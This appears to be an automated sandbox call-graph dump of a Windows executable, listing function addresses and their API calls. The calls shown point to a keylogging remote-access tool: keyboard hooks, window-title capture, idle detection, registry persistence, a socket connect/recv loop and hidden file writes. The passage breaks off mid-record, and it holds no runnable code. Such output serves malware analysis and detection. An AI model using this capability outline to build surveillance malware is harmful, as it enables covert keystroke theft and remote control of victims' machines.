402121 26 API calls 53019->53416 53021->52723 53023 402121 53022->53023 53024 402150 53023->53024 53417 402718 26 API calls _Deallocate 53023->53417 53024->52726 53027 4128c0 53026->53027 53028 406052 28 API calls 53027->53028 53029 4128d5 53028->53029 53030 401fbd 28 API calls 53029->53030 53031 4128e5 53030->53031 53032 4126d2 29 API calls 53031->53032 53033 4128ef 53032->53033 53034 401eea 26 API calls 53033->53034 53035 4128fc 53034->53035 53035->52772 53037 401f6e 53036->53037 53418 402301 53037->53418 53041 412722 53040->53041 53042 4126eb 53040->53042 53043 401eea 26 API calls 53041->53043 53045 4126fd RegSetValueExA RegCloseKey 53042->53045 53044 40dd3b 53043->53044 53044->52773 53045->53041 53047 43a600 _strftime 53046->53047 53422 43993e 53047->53422 53051 41a737 53050->53051 53052 41a69c GetLocalTime 53050->53052 53054 401eea 26 API calls 53051->53054 53053 404cbf 28 API calls 53052->53053 53055 41a6de 53053->53055 53056 41a73f 53054->53056 53057 405ce6 28 API calls 53055->53057 53058 401eea 26 API calls 53056->53058 53059 41a6ea 53057->53059 53060 40ddaa 53058->53060 53456 4027cb 53059->53456 53060->52797 53062 41a6f6 53063 405ce6 28 API calls 53062->53063 53064 41a702 53063->53064 53459 406478 76 API calls 53064->53459 53066 41a710 53067 401eea 26 API calls 53066->53067 53068 41a71c 53067->53068 53069 401eea 26 API calls 53068->53069 53070 41a725 53069->53070 53071 401eea 26 API calls 53070->53071 53072 41a72e 53071->53072 53073 401eea 26 API calls 53072->53073 53073->53051 53075 409536 _wcslen 53074->53075 53076 409541 53075->53076 53077 409558 53075->53077 53078 40c89e 32 API calls 53076->53078 53079 40c89e 32 API calls 53077->53079 53080 409549 53078->53080 53081 409560 53079->53081 53082 401e18 26 API calls 53080->53082 53083 401e18 26 API calls 53081->53083 53098 409553 53082->53098 53084 40956e 53083->53084 53085 401e13 26 API calls 53084->53085 53086 409576 53085->53086 53479 40856b 28 API calls 53086->53479 53087 401e13 26 API calls 53089 4095ad 53087->53089 53464 409837 53089->53464 53090 409588 53480 4028cf 53090->53480 53094 409593 53095 401e18 26 API calls 53094->53095 53096 40959d 53095->53096 53097 401e13 26 API calls 53096->53097 53097->53098 53098->53087 53672 403b40 53099->53672 53103 41a7fd 53104 4028cf 28 API calls 53103->53104 53105 41a807 53104->53105 53106 401e13 26 API calls 53105->53106 53107 41a810 53106->53107 53108 401e13 26 API calls 53107->53108 53109 40dfc3 53108->53109 53109->52849 53111 40e08b 53110->53111 53112 41248f RegQueryValueExA RegCloseKey 53110->53112 53111->52878 53111->52881 53112->53111 53114 4125b0 RegQueryValueExW RegCloseKey 53113->53114 53115 4125dd 53113->53115 53114->53115 53116 403b40 28 API calls 53115->53116 53117 40e0ba 53116->53117 53117->52891 53119 412992 RegDeleteValueW 53118->53119 53120 4129a6 53118->53120 53119->53120 53121 4129a2 53119->53121 53120->52900 53121->52900 53123 40cbc5 53122->53123 53124 41246e 3 API calls 53123->53124 53125 40cbcc 53124->53125 53129 40cbeb 53125->53129 53694 401602 53125->53694 53127 40cbd9 53697 4127d5 RegCreateKeyA 53127->53697 53130 413fd4 53129->53130 53131 413feb 53130->53131 53714 41aa73 53131->53714 53133 413ff6 53134 401d64 28 API calls 53133->53134 53135 41400f 53134->53135 53136 43a5e7 _strftime 42 API calls 53135->53136 53137 41401c 53136->53137 53138 414021 Sleep 53137->53138 53139 41402e 53137->53139 53138->53139 53140 401f66 28 API calls 53139->53140 53141 41403d 53140->53141 53142 401d64 28 API calls 53141->53142 53143 41404b 53142->53143 53144 401fbd 28 API calls 53143->53144 53145 414053 53144->53145 53146 41afc3 28 API calls 53145->53146 53147 41405b 53146->53147 53718 404262 WSAStartup 53147->53718 53149 414065 53150 401d64 28 API calls 53149->53150 53151 41406e 53150->53151 53152 401d64 28 API calls 53151->53152 53214 4140ed 53151->53214 53153 414087 53152->53153 53156 401d64 28 API calls 53153->53156 53154 401d64 28 API calls 53154->53214 53155 401fbd 28 API calls 53155->53214 53157 414098 53156->53157 53159 401d64 28 API calls 53157->53159 53158 41afc3 28 API calls 53158->53214 53160 4140a9 53159->53160 53161 401d64 28 API calls 53160->53161 53163 4140ba 53161->53163 53162 4085b4 28 API calls 53162->53214 53165 401d64 28 API calls 53163->53165 53164 401eef 26 API calls 53164->53214 53166 4140cb 53165->53166 53167 401d64 28 API calls 53166->53167 53168 4140dd 53167->53168 53831 404101 87 API calls 53168->53831 53171 414244 WSAGetLastError 53832 41bc76 30 API calls 53171->53832 53178 404cbf 28 API calls 53178->53214 53179 401d8c 26 API calls 53179->53214 53180 401d64 28 API calls 53181 414b68 53180->53181 53181->53180 53182 43a5e7 _strftime 42 API calls 53181->53182 53183 414b80 Sleep 53182->53183 53183->53214 53184 405ce6 28 API calls 53184->53214 53185 401f66 28 API calls 53185->53214 53188 4082dc 28 API calls 53188->53214 53189 440c51 26 API calls 53189->53214 53190 41265d 3 API calls 53190->53214 53191 412513 31 API calls 53191->53214 53192 403b40 28 API calls 53192->53214 53195 401d64 28 API calls 53196 4144ed GetTickCount 53195->53196 53197 41ad46 28 API calls 53196->53197 53197->53214 53199 41ad46 28 API calls 53199->53214 53202 41aec8 28 API calls 53202->53214 53204 40275c 28 API calls 53204->53214 53205 4027cb 28 API calls 53205->53214 53206 404468 60 API calls 53206->53214 53207 401eea 26 API calls 53207->53214 53208 401e13 26 API calls 53208->53214 53210 414ae4 53853 40a767 84 API calls 53210->53853 53212 41a686 79 API calls 53212->53214 53213 414b22 CreateThread 53213->53214 54330 419e89 103 API calls 53213->54330 53214->53154 53214->53155 53214->53158 53214->53162 53214->53164 53214->53171 53214->53178 53214->53179 53214->53181 53214->53184 53214->53185 53214->53188 53214->53189 53214->53190 53214->53191 53214->53192 53214->53195 53214->53199 53214->53202 53214->53204 53214->53205 53214->53206 53214->53207 53214->53208 53214->53210 53214->53212 53214->53213 53719 413f9a 53214->53719 53725 4041f1 53214->53725 53732 404915 53214->53732 53747 40428c connect 53214->53747 53807 41a96d 53214->53807 53810 413683 53214->53810 53813 40cbf1 53214->53813 53819 41adee 53214->53819 53822 41aca0 GetLastInputInfo GetTickCount 53214->53822 53823 41ac52 53214->53823 53828 40e679 GetLocaleInfoA 53214->53828 53833 404c9e 28 API calls 53214->53833 53834 4027ec 53214->53834 53838 4045d5 53214->53838 53854 4047eb WaitForSingleObject 53214->53854 53215->52649 53216->52660 53219 4085c0 53218->53219 53220 402e78 28 API calls 53219->53220 53221 4085e4 53220->53221 53221->52681 53223 4124e1 RegQueryValueExA RegCloseKey 53222->53223 53224 41250b 53222->53224 53223->53224 53224->52677 53225->52685 53226->52713 53227->52706 53228->52698 53229->52711 53231 40c8ba 53230->53231 53232 40c8da 53231->53232 53233 40c90f 53231->53233 53240 40c8d0 53231->53240 54342 41a74b 29 API calls 53232->54342 53236 41b15b 2 API calls 53233->53236 53235 40ca03 GetLongPathNameW 53238 403b40 28 API calls 53235->53238 53239 40c914 53236->53239 53237 40c8e3 53241 401e18 26 API calls 53237->53241 53242 40ca18 53238->53242 53243 40c918 53239->53243 53244 40c96a 53239->53244 53240->53235 53246 40c8ed 53241->53246 53247 403b40 28 API calls 53242->53247 53245 403b40 28 API calls 53243->53245 53248 403b40 28 API calls 53244->53248 53250 40c926 53245->53250 53252 401e13 26 API calls 53246->53252 53251 40ca27 53247->53251 53249 40c978 53248->53249 53256 403b40 28 API calls 53249->53256 53257 403b40 28 API calls 53250->53257 54331 40cc37 53251->54331 53252->53240 53259 40c98e 53256->53259 53260 40c93c 53257->53260 53258 40ca45 53261 402860 28 API calls 53258->53261 53262 402860 28 API calls 53259->53262 53263 402860 28 API calls 53260->53263 53264 40ca4f 53261->53264 53265 40c999 53262->53265 53266 40c947 53263->53266 53267 401e13 26 API calls 53264->53267 53268 401e18 26 API calls 53265->53268 53269 401e18 26 API calls 53266->53269 53270 40ca59 53267->53270 53271 40c9a4 53268->53271 53272 40c952 53269->53272 53273 401e13 26 API calls 53270->53273 53274 401e13 26 API calls 53271->53274 53275 401e13 26 API calls 53272->53275 53276 40ca62 53273->53276 53277 40c9ad 53274->53277 53278 40c95b 53275->53278 53279 401e13 26 API calls 53276->53279 53280 401e13 26 API calls 53277->53280 53281 401e13 26 API calls 53278->53281 53282 40ca6b 53279->53282 53280->53246 53281->53246 53283 401e13 26 API calls 53282->53283 53284 40ca74 53283->53284 53285 401e13 26 API calls 53284->53285 53286 40ca7d 53285->53286 53286->52759 53287->52770 53288->52793 53290 412683 RegQueryValueExA RegCloseKey 53289->53290 53291 4126a7 53289->53291 53290->53291 53291->52752 53292->52787 53293->52821 53294->52832 53296 401f66 28 API calls 53295->53296 53297 40c86b 53296->53297 53298 41ae08 28 API calls 53297->53298 53299 40c876 53298->53299 53300 40c89e 32 API calls 53299->53300 53301 40c887 53300->53301 53302 401e13 26 API calls 53301->53302 53303 40c890 53302->53303 53304 401eea 26 API calls 53303->53304 53305 40c898 53304->53305 53305->52857 53306->52843 53307->52877 53309 401e0c 53308->53309 53310->52704 53313 40e183 53312->53313 53314 41a65c LoadResource LockResource SizeofResource 53312->53314 53313->52933 53314->53313 53316 401f86 28 API calls 53315->53316 53317 406066 53316->53317 53317->52944 53328 403c30 53318->53328 53322 41bfae 53321->53322 53323 41bfd2 53322->53323 53324 41bfcb 53322->53324 53344 41c552 53323->53344 53363 41bfe3 28 API calls 53324->53363 53326 41bfd0 53326->52965 53329 403c39 53328->53329 53332 403c59 53329->53332 53333 403c68 53332->53333 53338 4032a4 53333->53338 53335 403c74 53336 402325 28 API calls 53335->53336 53337 403b73 53336->53337 53337->52965 53339 4032b0 53338->53339 53340 4032ad 53338->53340 53343 4032b6 28 API calls 53339->53343 53340->53335 53345 41c55c __EH_prolog 53344->53345 53346 41c673 53345->53346 53347 41c595 53345->53347 53370 402649 28 API calls std::_Xinvalid_argument 53346->53370 53364 4026a7 28 API calls 53347->53364 53351 41c5a9 53365 41c536 28 API calls 53351->53365 53353 41c5dc 53354 41c603 53353->53354 53355 41c5f7 53353->53355 53367 41c7cf 26 API calls 53354->53367 53366 41c7b2 26 API calls 53355->53366 53358 41c601 53369 41c75a 26 API calls 53358->53369 53359 41c60f 53368 41c7cf 26 API calls 53359->53368 53362 41c63e 53362->53326 53363->53326 53364->53351 53365->53353 53366->53358 53367->53359 53368->53358 53369->53362 53371->52969 53374 402e85 53373->53374 53375 402ea9 53374->53375 53376 402e98 53374->53376 53378 402eae 53374->53378 53375->52978 53380 403445 28 API calls 53376->53380 53378->53375 53381 40225b 26 API calls 53378->53381 53380->53375 53381->53375 53383 404bd0 53382->53383 53386 40245c 53383->53386 53385 404be4 53385->52981 53387 402469 53386->53387 53389 402478 53387->53389 53390 402ad3 28 API calls 53387->53390 53389->53385 53390->53389 53393 4021c6 53391->53393 53392 4021e8 53392->52985 53393->53392 53394 40262e 26 API calls 53393->53394 53394->53392 53396 401e94 53395->53396 53398 41b183 53397->53398 53399 41b168 GetCurrentProcess IsWow64Process 53397->53399 53398->52995 53399->53398 53400 41b17f 53399->53400 53400->52995 53402 412541 RegQueryValueExA RegCloseKey 53401->53402 53403 412569 53401->53403 53402->53403 53404 401f66 28 API calls 53403->53404 53405 41257e 53404->53405 53405->52998 53406->53006 53408 40b02f 53407->53408 53411 40b04b 53408->53411 53410 40b045 53410->53017 53412 40b055 53411->53412 53414 40b060 53412->53414 53415 40b138 28 API calls 53412->53415 53414->53410 53415->53414 53416->53021 53417->53024 53419 40230d 53418->53419 53420 402325 28 API calls 53419->53420 53421 401f80 53420->53421 53421->52763 53440 43a545 53422->53440 53424 43998b 53449 4392de 38 API calls 3 library calls 53424->53449 53426 439950 53426->53424 53427 439965 53426->53427 53439 40dd54 53426->53439 53447 445354 20 API calls _abort 53427->53447 53429 43996a 53448 43a827 26 API calls _Deallocate 53429->53448 53432 439997 53433 4399c6 53432->53433 53450 43a58a 42 API calls __Tolower 53432->53450 53436 439a32 53433->53436 53451 43a4f1 26 API calls 2 library calls 53433->53451 53452 43a4f1 26 API calls 2 library calls 53436->53452 53437 439af9 _strftime 53437->53439 53453 445354 20 API calls _abort 53437->53453 53439->52780 53439->52781 53441 43a54a 53440->53441 53442 43a55d 53440->53442 53454 445354 20 API calls _abort 53441->53454 53442->53426 53444 43a54f 53455 43a827 26 API calls _Deallocate 53444->53455 53446 43a55a 53446->53426 53447->53429 53448->53439 53449->53432 53450->53432 53451->53436 53452->53437 53453->53439 53454->53444 53455->53446 53460 401e9b 53456->53460 53458 4027d9 53458->53062 53459->53066 53461 401ea7 53460->53461 53462 40245c 28 API calls 53461->53462 53463 401eb9 53462->53463 53463->53458 53465 409855 53464->53465 53466 4124b7 3 API calls 53465->53466 53467 40985c 53466->53467 53468 409870 53467->53468 53469 40988a 53467->53469 53470 4095cf 53468->53470 53471 409875 53468->53471 53483 4082dc 53469->53483 53470->52816 53473 4082dc 28 API calls 53471->53473 53475 409883 53473->53475 53509 409959 29 API calls 53475->53509 53478 409888 53478->53470 53479->53090 53663 402d8b 53480->53663 53482 4028dd 53482->53094 53484 4082eb 53483->53484 53510 408431 53484->53510 53486 408309 53487 4098a5 53486->53487 53515 40affa 53487->53515 53490 4098f6 53493 401f66 28 API calls 53490->53493 53491 4098ce 53492 401f66 28 API calls 53491->53492 53494 4098d8 53492->53494 53495 409901 53493->53495 53496 41ae08 28 API calls 53494->53496 53497 401f66 28 API calls 53495->53497 53498 4098e6 53496->53498 53499 409910 53497->53499 53519 40a876 31 API calls _Yarn 53498->53519 53500 41a686 79 API calls 53499->53500 53502 409915 CreateThread 53500->53502 53504 409930 CreateThread 53502->53504 53505 40993c CreateThread 53502->53505 53525 4099a9 53502->53525 53503 4098ed 53506 401eea 26 API calls 53503->53506 53504->53505 53531 409993 53504->53531 53507 401e13 26 API calls 53505->53507 53528 4099b5 53505->53528 53506->53490 53508 409950 53507->53508 53508->53470 53509->53478 53662 40999f 135 API calls 53509->53662 53511 40843d 53510->53511 53513 40845b 53511->53513 53514 402f0d 28 API calls 53511->53514 53513->53486 53514->53513 53517 40b006 53515->53517 53516 4098c3 53516->53490 53516->53491 53517->53516 53520 403b9e 53517->53520 53519->53503 53521 403ba8 53520->53521 53523 403bb3 53521->53523 53524 403cfd 28 API calls 53521->53524 53523->53516 53524->53523 53534 409e48 53525->53534 53591 40a3f4 53528->53591 53640 4099e4 53531->53640 53535 409e5d Sleep 53534->53535 53554 409d97 53535->53554 53537 4099b2 53538 409e9d CreateDirectoryW 53543 409e6f 53538->53543 53539 409eae GetFileAttributesW 53539->53543 53540 401d64 28 API calls 53540->53543 53541 409ec5 SetFileAttributesW 53541->53543 53543->53535 53543->53537 53543->53538 53543->53539 53543->53540 53543->53541 53549 409f10 53543->53549 53567 41b58f 53543->53567 53544 409f3f PathFileExistsW 53544->53549 53546 401f86 28 API calls 53546->53549 53547 40a048 SetFileAttributesW 53547->53543 53548 401eea 26 API calls 53548->53549 53549->53544 53549->53546 53549->53547 53549->53548 53550 401eef 26 API calls 53549->53550 53551 406052 28 API calls 53549->53551 53553 401eea 26 API calls 53549->53553 53576 41b61a CreateFileW 53549->53576 53584 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 53549->53584 53550->53549 53551->53549 53553->53543 53555 409e44 53554->53555 53558 409dad 53554->53558 53555->53543 53556 409dcc CreateFileW 53557 409dda GetFileSize 53556->53557 53556->53558 53557->53558 53559 409e0f CloseHandle 53557->53559 53558->53556 53558->53559 53560 409e21 53558->53560 53561 409e04 Sleep 53558->53561 53562 409dfd 53558->53562 53559->53558 53560->53555 53564 4082dc 28 API calls 53560->53564 53561->53559 53585 40a7f0 83 API calls 53562->53585 53565 409e3d 53564->53565 53566 4098a5 126 API calls 53565->53566 53566->53555 53568 41b5a2 CreateFileW 53567->53568 53570 41b5db 53568->53570 53571 41b5df 53568->53571 53570->53543 53572 41b5f6 WriteFile 53571->53572 53573 41b5e6 SetFilePointer 53571->53573 53574 41b60b CloseHandle 53572->53574 53575 41b609 53572->53575 53573->53572 53573->53574 53574->53570 53575->53574 53577 41b640 53576->53577 53578 41b644 GetFileSize 53576->53578 53577->53549 53586 401e65 53578->53586 53580 41b658 53581 41b66a ReadFile 53580->53581 53582 41b677 53581->53582 53583 41b679 CloseHandle 53581->53583 53582->53583 53583->53577 53584->53549 53585->53561 53587 401e6d 53586->53587 53589 401e77 53587->53589 53590 4023b7 28 API calls 53587->53590 53589->53580 53590->53589 53619 40a402 53591->53619 53592 4099be 53593 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 53594 40b027 28 API calls 53593->53594 53594->53619 53597 41aca0 GetLastInputInfo GetTickCount 53597->53619 53599 40a4a2 GetWindowTextW 53599->53619 53601 401e13 26 API calls 53601->53619 53602 40a5ff 53604 401e13 26 API calls 53602->53604 53603 40affa 28 API calls 53603->53619 53604->53592 53605 40a569 Sleep 53605->53619 53608 401f66 28 API calls 53608->53619 53609 40a4f1 53611 4082dc 28 API calls 53609->53611 53609->53619 53624 40a876 31 API calls _Yarn 53609->53624 53611->53609 53613 405ce6 28 API calls 53613->53619 53615 4028cf 28 API calls 53615->53619 53616 41ae08 28 API calls 53616->53619 53617 409d58 27 API calls 53617->53619 53618 401eea 26 API calls 53618->53619 53619->53592 53619->53593 53619->53597 53619->53599 53619->53601 53619->53602 53619->53603 53619->53605 53619->53608 53619->53609 53619->53613 53619->53615 53619->53616 53619->53617 53619->53618 53620 433519 5 API calls __Init_thread_wait 53619->53620 53621 4338a5 29 API calls __onexit 53619->53621 53622 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 53619->53622 53623 4082a8 28 API calls 53619->53623 53625 40b0dd 28 API calls 53619->53625 53626 40ae58 44 API calls 2 library calls 53619->53626 53627 440c51 53619->53627 53631 404c9e 28 API calls 53619->53631 53620->53619 53621->53619 53622->53619 53623->53619 53624->53609 53625->53619 53626->53619 53628 440c5d 53627->53628 53632 440a4d 53628->53632 53631->53619 53633 440a64 53632->53633 53637 440aa5 53633->53637 53638 445354 20 API calls _abort 53633->53638 53635 440a9b 53639 43a827 26 API calls _Deallocate 53635->53639 53637->53619 53638->53635 53639->53637 53641 409a63 GetMessageA 53640->53641 53642 4099ff SetWindowsHookExA 53640->53642 53643 409a75 TranslateMessage DispatchMessageA 53641->53643 53644 40999c 53641->53644 53642->53641 53646 409a1b GetLastError 53642->53646 53643->53641 53643->53644 53656 41ad46 53646->53656 53650 409a3e 53651 401f66 28 API calls 53650->53651 53652 409a4d 53651->53652 53653 41a686 79 API calls 53652->53653 53654 409a52 53653->53654 53655 401eea 26 API calls 53654->53655 53655->53644 53657 440c51 26 API calls 53656->53657 53658 41ad67 53657->53658 53659 401f66 28 API calls 53658->53659 53660 409a31 53659->53660 53661 404c9e 28 API calls 53660->53661 53661->53650 53664 402d97 53663->53664 53667 4030f7 53664->53667 53666 402dab 53666->53482 53668 403101 53667->53668 53670 403115 53668->53670 53671 4036c2 28 API calls 53668->53671 53670->53666 53671->53670 53673 403b48 53672->53673 53679 403b7a 53673->53679 53676 403cbb 53683 403dc2 53676->53683 53678 403cc9 53678->53103 53680 403b86 53679->53680 53681 403b9e 28 API calls 53680->53681 53682 403b5a 53681->53682 53682->53676 53684 403dce 53683->53684 53687 402ffd 53684->53687 53686 403de3 53686->53678 53688 40300e 53687->53688 53689 4032a4 28 API calls 53688->53689 53690 40301a 53689->53690 53692 40302e 53690->53692 53693 4035e8 28 API calls 53690->53693 53692->53686 53693->53692 53700 4395ba 53694->53700 53698 412814 53697->53698 53699 4127ed RegSetValueExA RegCloseKey 53697->53699 53698->53129 53699->53698 53703 43953b 53700->53703 53702 401608 53702->53127 53704 43954a 53703->53704 53705 43955e 53703->53705 53711 445354 20 API calls _abort 53704->53711 53709 43955a __alldvrm 53705->53709 53713 447601 11 API calls 2 library calls 53705->53713 53708 43954f 53712 43a827 26 API calls _Deallocate 53708->53712 53709->53702 53711->53708 53712->53709 53713->53709 53715 41aab9 ctype ___scrt_fastfail 53714->53715 53716 401f66 28 API calls 53715->53716 53717 41ab2e 53716->53717 53717->53133 53718->53149 53720 413fb3 WSASetLastError 53719->53720 53721 413fa9 53719->53721 53720->53214 53867 413e37 35 API calls ___std_exception_copy 53721->53867 53723 413fae 53723->53720 53726 404206 socket 53725->53726 53727 4041fd 53725->53727 53728 404220 53726->53728 53729 404224 CreateEventW 53726->53729 53868 404262 WSAStartup 53727->53868 53728->53214 53729->53214 53731 404202 53731->53726 53731->53728 53733 4049b1 53732->53733 53734 40492a 53732->53734 53733->53214 53735 404933 53734->53735 53736 404987 CreateEventA CreateThread 53734->53736 53737 404942 GetLocalTime 53734->53737 53735->53736 53736->53733 53870 404b1d 53736->53870 53738 41ad46 28 API calls 53737->53738 53739 40495b 53738->53739 53869 404c9e 28 API calls 53739->53869 53741 404968 53742 401f66 28 API calls 53741->53742 53743 404977 53742->53743 53744 41a686 79 API calls 53743->53744 53745 40497c 53744->53745 53746 401eea 26 API calls 53745->53746 53746->53736 53748 4043e1 53747->53748 53749 4042b3 53747->53749 53750 404343 53748->53750 53751 4043e7 WSAGetLastError 53748->53751 53749->53750 53752 4042e8 53749->53752 53755 404cbf 28 API calls 53749->53755 53750->53214 53751->53750 53753 4043f7 53751->53753 53874 420151 27 API calls 53752->53874 53756 4042f7 53753->53756 53757 4043fc 53753->53757 53759 4042d4 53755->53759 53763 401f66 28 API calls 53756->53763 53879 41bc76 30 API calls 53757->53879 53758 4042f0 53758->53756 53762 404306 53758->53762 53764 401f66 28 API calls 53759->53764 53761 40440b 53880 404c9e 28 API calls 53761->53880 53772 404315 53762->53772 53773 40434c 53762->53773 53766 404448 53763->53766 53767 4042e3 53764->53767 53770 401f66 28 API calls 53766->53770 53768 41a686 79 API calls 53767->53768 53768->53752 53769 404418 53771 401f66 28 API calls 53769->53771 53774 404457 53770->53774 53775 404427 53771->53775 53777 401f66 28 API calls 53772->53777 53876 420f34 56 API calls 53773->53876 53778 41a686 79 API calls 53774->53778 53779 41a686 79 API calls 53775->53779 53781 404324 53777->53781 53778->53750 53782 40442c 53779->53782 53780 404354 53783 404389 53780->53783 53784 404359 53780->53784 53785 401f66 28 API calls 53781->53785 53787 401eea 26 API calls 53782->53787 53878 4202ea 28 API calls 53783->53878 53788 401f66 28 API calls 53784->53788 53789 404333 53785->53789 53787->53750 53791 404368 53788->53791 53792 41a686 79 API calls 53789->53792 53790 404391 53793 4043be CreateEventW CreateEventW 53790->53793 53796 401f66 28 API calls 53790->53796 53794 401f66 28 API calls 53791->53794 53795 404338 53792->53795 53793->53750 53797 404377 53794->53797 53875 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53795->53875 53799 4043a7 53796->53799 53800 41a686 79 API calls 53797->53800 53801 401f66 28 API calls 53799->53801 53802 40437c 53800->53802 53803 4043b6 53801->53803 53877 420592 54 API calls 53802->53877 53805 41a686 79 API calls 53803->53805 53806 4043bb 53805->53806 53806->53793 53881 41a945 GlobalMemoryStatusEx 53807->53881 53809 41a982 53809->53214 53882 413646 53810->53882 53814 40cc0d 53813->53814 53815 41246e 3 API calls 53814->53815 53817 40cc14 53815->53817 53816 40cc2c 53816->53214 53817->53816 53818 4124b7 3 API calls 53817->53818 53818->53816 53820 401f86 28 API calls 53819->53820 53821 41ae03 53820->53821 53821->53214 53822->53214 53824 436050 ___scrt_fastfail 53823->53824 53825 41ac71 GetForegroundWindow GetWindowTextW 53824->53825 53826 403b40 28 API calls 53825->53826 53827 41ac9b 53826->53827 53827->53214 53829 401f66 28 API calls 53828->53829 53830 40e69e 53829->53830 53830->53214 53831->53214 53832->53214 53833->53214 53835 4027f8 53834->53835 53836 402e78 28 API calls 53835->53836 53837 402814 53836->53837 53837->53214 53841 4045ec 53838->53841 53839 43a88c _Yarn 21 API calls 53839->53841 53841->53839 53842 401f86 28 API calls 53841->53842 53843 401eef 26 API calls 53841->53843 53844 404666 53841->53844 53847 401eea 26 API calls 53841->53847 53923 40455b 53841->53923 53929 404688 53841->53929 53842->53841 53843->53841 53845 4047eb 98 API calls 53844->53845 53846 40466d 53845->53846 53848 401eea 26 API calls 53846->53848 53847->53841 53849 404676 53848->53849 53850 401eea 26 API calls 53849->53850 53851 40467f 53850->53851 53851->53214 53853->53214 53855 404805 SetEvent CloseHandle 53854->53855 53856 40481c closesocket 53854->53856 53857 40489c 53855->53857 53858 404829 53856->53858 53857->53214 53859 40483f 53858->53859 54327 404ab1 83 API calls 53858->54327 53861 404851 WaitForSingleObject 53859->53861 53862 404892 SetEvent CloseHandle 53859->53862 54328 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53861->54328 53862->53857 53864 404860 SetEvent WaitForSingleObject 54329 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53864->54329 53866 404878 SetEvent CloseHandle CloseHandle 53866->53862 53867->53723 53868->53731 53869->53741 53873 404b29 101 API calls 53870->53873 53872 404b26 53873->53872 53874->53758 53875->53750 53876->53780 53877->53795 53878->53790 53879->53761 53880->53769 53881->53809 53885 413619 53882->53885 53886 41362e ___scrt_initialize_default_local_stdio_options 53885->53886 53889 43e2dd 53886->53889 53892 43b030 53889->53892 53893 43b058 53892->53893 53895 43b070 53892->53895 53916 445354 20 API calls _abort 53893->53916 53895->53893 53896 43b078 53895->53896 53918 4392de 38 API calls 3 library calls 53896->53918 53897 43b05d 53917 43a827 26 API calls _Deallocate 53897->53917 53900 43b088 53919 43b7b6 20 API calls 2 library calls 53900->53919 53903 43b100 53920 43be24 50 API calls 3 library calls 53903->53920 53904 41363c 53904->53214 53907 43b068 53909 433d2c 53907->53909 53908 43b10b 53921 43b820 20 API calls _free 53908->53921 53910 433d37 IsProcessorFeaturePresent 53909->53910 53911 433d35 53909->53911 53913 4341a4 53910->53913 53911->53904 53922 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53913->53922 53915 434287 53915->53904 53916->53897 53917->53907 53918->53900 53919->53903 53920->53908 53921->53907 53922->53915 53924 404592 recv 53923->53924 53925 404565 WaitForSingleObject 53923->53925 53926 4045a5 53924->53926 53942 420556 56 API calls 53925->53942 53926->53841 53928 404581 SetEvent 53928->53926 53937 4046a3 53929->53937 53930 4047d8 53931 401eea 26 API calls 53930->53931 53932 4047e1 53931->53932 53932->53841 53933 403b60 28 API calls 53933->53937 53934 401fbd 28 API calls 53934->53937 53935 401ebd 28 API calls 53936 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 53935->53936 53936->53937 54242 414b9b 53936->54242 53937->53930 53937->53933 53937->53934 53937->53935 53938 401eef 26 API calls 53937->53938 53939 401eea 26 API calls 53937->53939 53941 402654 26 API calls 53937->53941 53943 411b60 53937->53943 53938->53937 53939->53937 53941->53937 53942->53928 53944 411b72 53943->53944 53945 403b60 28 API calls 53944->53945 53946 411b85 53945->53946 53947 401fbd 28 API calls 53946->53947 53948 411b94 53947->53948 53949 401fbd 28 API calls 53948->53949 53950 411ba3 53949->53950 53951 41afc3 28 API calls 53950->53951 53952 411bac 53951->53952 53953 411c60 53952->53953 53955 401d64 28 API calls 53952->53955 53954 401d8c 26 API calls 53953->53954 53956 411c69 53954->53956 53957 411bc8 53955->53957 53958 401eea 26 API calls 53956->53958 53959 401fbd 28 API calls 53957->53959 53960 411c72 53958->53960 53961 411bd0 53959->53961 53962 401eea 26 API calls 53960->53962 53963 401d64 28 API calls 53961->53963 53964 411c7a 53962->53964 53965 411be0 53963->53965 53964->53937 53966 401fbd 28 API calls 53965->53966 53967 411be8 53966->53967 53968 401d64 28 API calls 53967->53968 53969 411bf8 53968->53969 53970 401fbd 28 API calls 53969->53970 53971 411c00 53970->53971 53972 401d64 28 API calls 53971->53972 53973 411c10 53972->53973 53974 401fbd 28 API calls 53973->53974 53975 411c18 53974->53975 53976 401d64 28 API calls 53975->53976 53977 411c28 53976->53977 53978 401fbd 28 API calls 53977->53978 53979 411c30 53978->53979 53980 401d64 28 API calls 53979->53980 53981 411c43 53980->53981 53982 401fbd 28 API calls 53981->53982 53983 411c4b 53982->53983 53987 411c81 GetModuleFileNameW 53983->53987 53986 4047eb 98 API calls 53986->53953 54009 411cac 53987->54009 53988 40c854 32 API calls 53988->54009 53989 401eea 26 API calls 53989->54009 53990 41ab38 42 API calls 53990->54009 53991 4028cf 28 API calls 53991->54009 53992 4176b6 31 API calls 53992->54009 53993 411dea Sleep 53993->54009 53994 403b40 28 API calls 53994->54009 53995 403cbb 28 API calls 53995->54009 53996 401e13 26 API calls 53996->54009 53997 411e8c Sleep 53997->54009 53998 403cdc 28 API calls 53998->54009 53999 411f2e Sleep 53999->54009 54000 41b61a 32 API calls 54000->54009 54001 411f90 DeleteFileW 54001->54009 54002 411fc7 DeleteFileW 54002->54009 54003 412019 Sleep 54003->54009 54004 412003 DeleteFileW 54004->54009 54005 412092 54006 401e13 26 API calls 54005->54006 54007 41209e 54006->54007 54008 401e13 26 API calls 54007->54008 54010 4120aa 54008->54010 54009->53988 54009->53989 54009->53990 54009->53991 54009->53992 54009->53993 54009->53994 54009->53995 54009->53996 54009->53997 54009->53998 54009->53999 54009->54000 54009->54001 54009->54002 54009->54003 54009->54004 54009->54005 54013 41205e Sleep 54009->54013 54011 401e13 26 API calls 54010->54011 54012 4120b6 54011->54012 54014 40b027 28 API calls 54012->54014 54015 401e13 26 API calls 54013->54015 54016 4120c9 54014->54016 54020 41206e 54015->54020 54018 401fbd 28 API calls 54016->54018 54017 401e13 26 API calls 54017->54020 54019 4120e9 54018->54019 54129 4123f7 54019->54129 54020->54009 54020->54017 54022 412090 54020->54022 54022->54012 54024 401e13 26 API calls 54025 412100 54024->54025 54026 412125 54025->54026 54027 412274 54025->54027 54141 41aec8 54026->54141 54028 